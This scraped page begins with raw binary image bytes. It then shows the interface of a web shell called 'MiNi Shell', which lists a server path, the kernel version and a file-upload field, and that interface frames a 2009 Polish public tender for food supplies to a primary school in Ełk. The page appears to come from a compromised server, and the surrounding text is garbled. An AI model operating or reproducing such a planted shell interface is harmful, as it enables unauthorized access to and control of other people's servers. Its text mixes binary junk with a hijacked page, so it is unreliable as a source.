JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090525/79285-N-2009.html

<p class="kh_header"><b>Ełk: Dostawa artykułów żywnościowych  na  potrzeby Szkoły Podstawowej nr 5  ul. św. M .M. Kolbego  nr 11 w Ełku</b><br>
<b>Numer ogłoszenia: 79285 - 2009; data zamieszczenia: 25.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa nr 5 w Ełku , ul. Św. M. M. Kolbego 11, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 0-87 6203171, faks 0-87 6203171.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych  na  potrzeby Szkoły Podstawowej nr 5  ul. św. M .M. Kolbego  nr 11 w Ełku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> GRUPA I

Oferta od 01.09.2009 r. - 30.06.2010 r.

Warzywa i owoce  CPV - 03220000-9
Lp.
Asortyment
Jedn. miary
Ilość
Cena netto
Vat
Wartość ogółem brutto
Warzywa
1.
Ziemniaki 
CPV 03212100-1
kg
  22000



2.
Marchew
CPV 03221112-4
kg
    2500



3.
Pietruszka
CPV 03221110-0
kg
      420



4.
Seler
CPV 03221110-0
kg
      420



5.
Cebula
CPV 0322113-1
kg
    1100



6.
nać pietruszki
CPV 03221000-6
szt
    2000



7.
Koper
CPV  03221000-6
szt
    2000



8.
Por
CPV  03221000-6
kg
      350



9.
Ogórek kwaszony
CPV 15331000-7
kg
      800



10
Ogórek świeży
CPV 03221270-9
kg
    1500



11
Pomidory
CPV 03221240-0
kg
    1500



12
Papryka, żółta, zielona czerwona
CPV 03221230-7
kg
      170



13
Kapusta biała
CPV 03221410-3
kg
    3500



14
Kapusta pekińska
CPV 03221410-3
kg
     500



15
Kapusta czerwona
CPV 03221410-3
kg
   1000



16
Kapusta kwaszona
CPV 15331461-6
kg
    1200



17
Rzepa Agata
CPV 03221114-8
kg
      500



18
Sałata
CPV 03221310-2
szt.
    2000



19
Ogórek korniszon 0,9l
CPV 15331400-1
szt.
    1000



20
Fasola średni Jaś
CPV 03221210-1
kg
     300



21
Fasola drobna
CPV 03221210-1
kg                
     200



22
Groch połówki
CPV 03221220-4
kg
     200



23
Groszek konserwowy 400g
CPV 15331400-1
szt.
     500



24
Kukurydza konserwowa 400g
CPV 15331470-2
szt.
     400



25
Buraki czerwone
CPV 03221110-0
kg
   2000



26
Cytryna
CPV 03222210-8
kg
     250



27
Jaja
CPV 03142500-3
kg
    1600



28
Pieczarki
CPV 03221260-6
kg
      600



29
Fasolka czerwona konserwowa 400g
CPV15331400-1
szt.
      200



30
Papryka konserwowa 0,9l
CPV 15331400-1
szt.
      200



31
Czosnek
CPV 03221110-0
szt.
       70



32
Szczaw  konserwowy 300g
CPV   15331400-1
szt.            
       50



33
Rzodkiewka
CPV 03221110-0
pęcz.
    1500



34
Szczypior
CPV 03221110-0
Pęcz

    1500



             Owoce
35
Pomarańcze
CPV 03222220-1
kg
  2500



36
Mandarynki
CPV 03222240-7
kg
  2500



37
Banany
CPV 03222111-4
kg
   3000



38
Brzoskwinie w syropie 820g
CPV 15332100-4
szt.
   300



39
Jabłka
CPV 03222200-5
kg
  5200



40
Nektarynka
CPV 03222200-5
kg
   1800



41
Brzoskwinia
CPV 03222332-9
kg
   1800



42
Kiwi
CPV 03222118-3
kg
   800



   
 


GRUPA II

Oferta od 01.09.2009 r. - 30.06.2010 r.

Mięso i jego przetwory CPV 15110000-2

Lp.
Asortyment
Jedn. Miary
Ilość
Cena 
netto
Vat
Wartość ogółem brutto
Mięso surowe
1.
Mięso wieprzowe drobne 
CPV 15110000-2
kg
4000



2.
Mięso drobiowe  drobne
CPV   15112000-6
kg
550



3.
Polędwica surowa bez kości
CPV 15110000-2
kg
600



4.
Serca wieprzowe
CPV 15114000-0
kg
400



5.
Ozorki wieprzowe
CPV 15114000-0
kg
   450



6.
Wątroba wieprzowa
CPV 15114000-0
kg
500



7.
Końcówki kości schabowych
CPV 15110000-2
kg
1300



8.
Podudzia z kurczaka
CPV 15112000-6
kg
550



9.
Udka z kurczaka
CPV 15112000-6
kg
200



10.
Filet kurczęcy
CPV 15112000-6
kg
1080



11.
Pachwina surowa
CPV 15110000-2
kg
150



12.
Słonina
CPV 15114000-0
kg
50



13.
Łopatka wieprzowa b/k karczek                         
CPV 15110000-2
    kg
    kg
   550
   550



Wędliny
14.
Polędwica wędzona wieprzowa
CPV 15131130-5
kg
80



15.
Szynka wędzona wieprzowa
CPV 15131210-0
kg
80



16.
Pasztet drobiowy typu białostocki 280g
CPV 15131310-1
szt.
  400



17.
Pachwina wędzona 
CPV 15131130-5
kg
80



18.
Kiełbasa cienka  typu śląska
CPV 15131130-5
kg
250



19.
Polędwica drobiowa
CPV 15131135-0
kg
80



20.
Szynka konserwowa
CPV 15131000-5
kg
70



21.
Mielonka wieprzowa typu Lancheon 300g
CPV 15131000-5
      
      szt.
  
   250




22.
Kiełbaski typu berlinetki
CPV 15131130-5
      kg
100



23.
Boczek wędzony
CPV 15130000-8
     kg
  120



  
  

GRUPA III

Oferta od 01.09.2009 r. - 30.06.2010 r.

Ryby  CPV 15220000-6

Lp.
Asortyment
Jedn. Miary
Ilość
Cena 
netto
Vat
Wartość ogółem brutto
Ryby
1.
Filet  z miruny ze skórą
CPV 15220000-6
kg
1800




  


GRUPA IV

Oferta od 01.09.2009 r. - 30.06.2010 r.

Mrożonki  CPV 15331170-9







Lp.
Asortyment
Jedn. Miary
Ilość
Cena 
netto
Vat
Wartość ogółem brutto
2.
Kalafior mrożony 
CPV 15331170-9
kg
600



3.
Mieszanka kompotowa
CPV 15331170-9
kg
2000



4.
Marchewka z groszkiem
CPV  15331170-9
kg
550



5.
Mieszanka warzywna
CPV 15331170-9
kg
600



6.
Truskawki mrożone
CPV 03222313-0
kg
500.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 15.11.00.00-2, 15.22.00.00-6, 15.33.11.70-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:
     1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
    2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i   osobami zdolnymi do wykonania Zamówienia 
      3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia; 
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
2.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły: spełnia/nie spełnia
1.W zakresie warunków wskazanych w § IV ust. 1 pkt. 1) i § IV ust.1 pkt. 4) ocena spełnienia warunków nastąpi (zgodnie z Rozporządzeniem Prezesa RM z dnia 16 października 2008 . w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu  o udzielenie zamówienia publicznego, jakich możne żądać zamawiający od wykonawcy, Dz. U. Nr 188, poz. 1155 ) na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w § V ust. 1 pkt. 1 - pkt. 4) 
Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4, (j.t - Dz. U. z 2007 r. Nr 223, poz. 1655 oraz z 2008 r. Nr 171, poz. 1058 - z późniejszymi zmianami)
nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, (j.t - Dz. U. z 2007 r. Nr 223, poz. 1655 oraz z 2008 r. Nr 171, poz. 1058 - z późniejszymi zmianami)
wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi  w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji, 
złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania, 
nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3,  ustawy  Prawo zamówień publicznych z dnia 29 stycznia 2004 r. (j.t - Dz. U. z 2007 r. Nr 223, poz. 1655 oraz z 2008 r. Nr 171, poz. 1058 - z późniejszymi zmianami).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie od Wykonawcy  o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2.Oświadczenie od Wykonawcy  lub zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące prze upływem terminu składania ofert; 
3.Oświadczenie od Wykonawcy  lub zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega   z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące prze upływem terminu składania ofert; 
4.Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu  z art. 22 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 r. (j.t - Dz. U. z 2007 r. Nr 223, poz. 1655 oraz z 2008 r. Nr 171, poz. 1058 - z późniejszymi zmianami)
             Art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:
     1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
    2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i   osobami zdolnymi do wykonania Zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia:
      3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia; 
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 

Dokumenty dodatkowe:

1.Oświadczenie, w którym wykonawca potwierdza, że zapoznał się z SIWZ i umową oraz nie wnosi zastrzeżeń.
2.Oświadczenie, w którym Wykonawca potwierdza, że jest związany ofertą przez okres   30 dni od dnia, w którym upływa termin składania ofert.
3.Podpisany przez osoby uprawnione projekt  umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www: sp5.elk.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Niniejszą SIWZ można pobrać bezpłatnie w siedzibie zamawiającego:  Szkoła Podstawowa nr 5 w Ełku  ul. św.M.M. Kolbego nr 11.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2009 godzina 12:30, miejsce: Szkoła Podstawowa nr 5 w Ełku   ul. św. M. M. Kolbego nr 11   ;19-300 Ełk  -  sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa I -  Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GRUPA I

Oferta od 01.09.2009 r. - 30.06.2010 r.

Warzywa i owoce  CPV - 03220000-9
Lp.
Asortyment
Jedn. miary
Ilość
Cena netto
Vat
Wartość ogółem brutto
Warzywa
1.
Ziemniaki 
CPV 03212100-1
kg
  22000



2.
Marchew
CPV 03221112-4
kg
    2500



3.
Pietruszka
CPV 03221110-0
kg
      420



4.
Seler
CPV 03221110-0
kg
      420



5.
Cebula
CPV 0322113-1
kg
    1100



6.
nać pietruszki
CPV 03221000-6
szt
    2000



7.
Koper
CPV  03221000-6
szt
    2000



8.
Por
CPV  03221000-6
kg
      350



9.
Ogórek kwaszony
CPV 15331000-7
kg
      800



10
Ogórek świeży
CPV 03221270-9
kg
    1500



11
Pomidory
CPV 03221240-0
kg
    1500



12
Papryka, żółta, zielona czerwona
CPV 03221230-7
kg
      170



13
Kapusta biała
CPV 03221410-3
kg
    3500



14
Kapusta pekińska
CPV 03221410-3
kg
     500



15
Kapusta czerwona
CPV 03221410-3
kg
   1000



16
Kapusta kwaszona
CPV 15331461-6
kg
    1200



17
Rzepa Agata
CPV 03221114-8
kg
      500



18
Sałata
CPV 03221310-2
szt.
    2000



19
Ogórek korniszon 0,9l
CPV 15331400-1
szt.
    1000



20
Fasola średni Jaś
CPV 03221210-1
kg
     300



21
Fasola drobna
CPV 03221210-1
kg                
     200



22
Groch połówki
CPV 03221220-4
kg
     200



23
Groszek konser-wowy 400g
CPV 15331400-1
szt.
     500



24
Kukurydza kon-serwowa 400g
CPV 15331470-2
szt.
     400



25
Buraki czerwone
CPV 03221110-0
kg
   2000



26
Cytryna
CPV 03222210-8
kg
     250



27
Jaja
CPV 03142500-3
kg
    1600



28
Pieczarki
CPV 03221260-6
kg
      600



29
Fasolka czerwona konserwowa 400g
CPV15331400-1
szt.
      200



30
Papryka konse-rwowa 0,9l
CPV 15331400-1
szt.
      200



31
Czosnek
CPV 03221110-0
szt.
       70



32
Szczaw  konser-wowy 300g
CPV   15331400-1
szt.            
       50



33
Rzodkiewka
CPV 03221110-0
pęcz.
    1500



34
Szczypior
CPV 03221110-0
Pęcz

    1500



             Owoce
35
Pomarańcze
CPV 03222220-1
kg
  2500



36
Mandarynki
CPV 03222240-7
kg
  2500



37
Banany
CPV 03222111-4
kg
   3000



38
Brzoskwinie w syropie 820g
CPV 15332100-4
szt.
   300



39
Jabłka
CPV 03222200-5
kg
  5200



40
Nektarynka
CPV 03222200-5
kg
   1800



41
Brzoskwinia
CPV 03222332-9
kg
   1800



42
Kiwi
CPV 03222118-3
kg
   800.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa II-   Mięso i przetwory.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso i jego przetwory CPV 15110000-2

Lp.
Asortyment
Jedn. Miary
Ilość
Cena 
netto
Vat
Wartość ogółem brutto
Mięso surowe
1.
Mięso wieprzowe drobne 
CPV 15110000-2
kg
4000



2.
Mięso drobiowe  drobne
CPV   15112000-6
kg
550



3.
Polędwica surowa bez kości
CPV 15110000-2
kg
600



4.
Serca wieprzowe
CPV 15114000-0
kg
400



5.
Ozorki wieprzowe
CPV 15114000-0
kg
   450



6.
Wątroba wieprzowa
CPV 15114000-0
kg
500



7.
Końcówki kości schabowych
CPV 15110000-2
kg
1300



8.
Podudzia z kurczaka
CPV 15112000-6
kg
550



9.
Udka z kurczaka
CPV 15112000-6
kg
200



10.
Filet kurczęcy
CPV 15112000-6
kg
1080



11.
Pachwina surowa
CPV 15110000-2
kg
150



12.
Słonina
CPV 15114000-0
kg
50



13.
Łopatka wieprzowa bk karczek                         
CPV 15110000-2
    kg
    kg
   550
   550



Wędliny
14.
Polędwica wędzona wieprzowa
CPV 15131130-5
kg
80



15.
Szynka wędzona wieprzowa
CPV 15131210-0
kg
80



16.
Pasztet drobiowy typu białostocki 280g
CPV 15131310-1
szt.
  400



17.
Pachwina wędzona 
CPV 15131130-5
kg
80



18.
Kiełbasa cienka  typu śląska
CPV 15131130-5
kg
250



19.
Polędwica drobiowa
CPV 15131135-0
kg
80



20.
Szynka konserwowa
CPV 15131000-5
kg
70



21.
Mielonka wieprzowa typu Lancheon 300g
CPV 15131000-5
      
      szt.
  
   250




22.
Kiełbaski typu berlinetki
CPV 15131130-5
      kg
100



23.
Boczek wędzony
CPV 15130000-8
     kg
  120.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa III-  Ryby.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GRUPA III

Oferta od 01.09.2009 r. - 30.06.2010 r.

Ryby  CPV 15220000-6

Lp.
Asortyment
Jedn. Miary
Ilość
Cena 
netto
Vat
Wartość ogółem brutto
Ryby
1.
Filet  z miruny ze skórą
CPV 15220000-6
kg
1800.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Grupa IV -  Mrożonki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GRUPA IV

Oferta od 01.09.2009 r. - 30.06.2010 r.

Mrożonki  CPV 15331170-9







Lp.
Asortyment
Jedn. Miary
Ilość
Cena 
netto
Vat
Wartość ogółem brutto
2.
Kalafior mrożony 
CPV 15331170-9
kg
600



3.
Mieszanka kompotowa
CPV 15331170-9
kg
2000



4.
Marchewka z groszkiem
CPV  15331170-9
kg
550



5.
Mieszanka warzywna
CPV 15331170-9
kg
600



6.
Truskawki mrożone
CPV 03222313-0
kg
500.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com